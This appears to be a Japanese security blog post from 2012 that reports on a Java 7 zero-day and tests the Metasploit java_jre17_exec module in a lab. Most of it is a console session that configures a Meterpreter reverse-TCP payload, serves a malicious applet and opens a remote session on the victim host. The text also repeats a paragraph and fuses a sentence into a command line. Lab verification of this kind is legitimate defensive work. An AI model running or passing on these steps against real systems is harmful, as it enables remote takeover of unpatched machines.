8月26日に Java の 0-day に関する Exploit code が公開される
http://pastie.org/4594319
FireEye からはこの Java の 0-day が実際に使用されているとの報告
8月28日になってようやく JVN に登録される。
http://jvn.jp/cert/JVNTA12-240A/index.html
Metasploit のモジュールが8月27日に公開されていたので早速試してみる。
https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day
http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_exec
が、検証環境だとうまく動作しない。
検索してみると、JRE のバージョンによって Exploit が成功しない場合もあるとのこと。
http://scrammed.blogspot.jp/2012/08/analysing-cve-2012-xxxx-latest-java-0day.html
色々試した結果、検証環境のブラウザが IE6 だったのが原因・・・。
IE8 にすると成功するが、詳細までは調べていない。
が、検証環境だとうまく動作しない。
検索してみると、JRE のバージョンによって Exploit が成功しない場合もあるとのこと。
http://scrammed.blogspot.jp/2012/08/analysing-cve-2012-xxxx-latest-java-0day.html
色々試した結果、検証環境のブラウザが IE6 だったのが原因・・・。
IE8 にすると成功するが、詳細までは調べていない。
msf > use exploit/multi/browser/java_jre17_exec8月28日時点ではまだ JRE の修正版は出ていない。
msf exploit(java_jre17_exec) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_exec) > set srvhost 172.16.0.80
srvhost => 172.16.0.80
msf exploit(java_jre17_exec) > set srvport 80
srvport => 80
msf exploit(java_jre17_exec) > set uripath jre
uripath => jre
msf exploit(java_jre17_exec) > set lhost 172.16.0.80
lhost => 172.16.0.80
msf exploit(java_jre17_exec) > set lport 8080
lport => 8080
msf exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.80:8080
[*] Using URL: http://172.16.0.80:80/jre
[*] Server started.
msf exploit(java_jre17_exec) > [*] 172.16.0.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 172.16.0.100 java_jre17_exec - Sending Applet.jar
[*] 172.16.0.100 java_jre17_exec - Sending Applet.jar
[*] Sending stage (30216 bytes) to 172.16.0.100
[*] Meterpreter session 1 opened (172.16.0.80:8080 -> 172.16.0.100:1118) at 2012-08-28 20:32:52 +0900
msf exploit(java_jre17_exec) >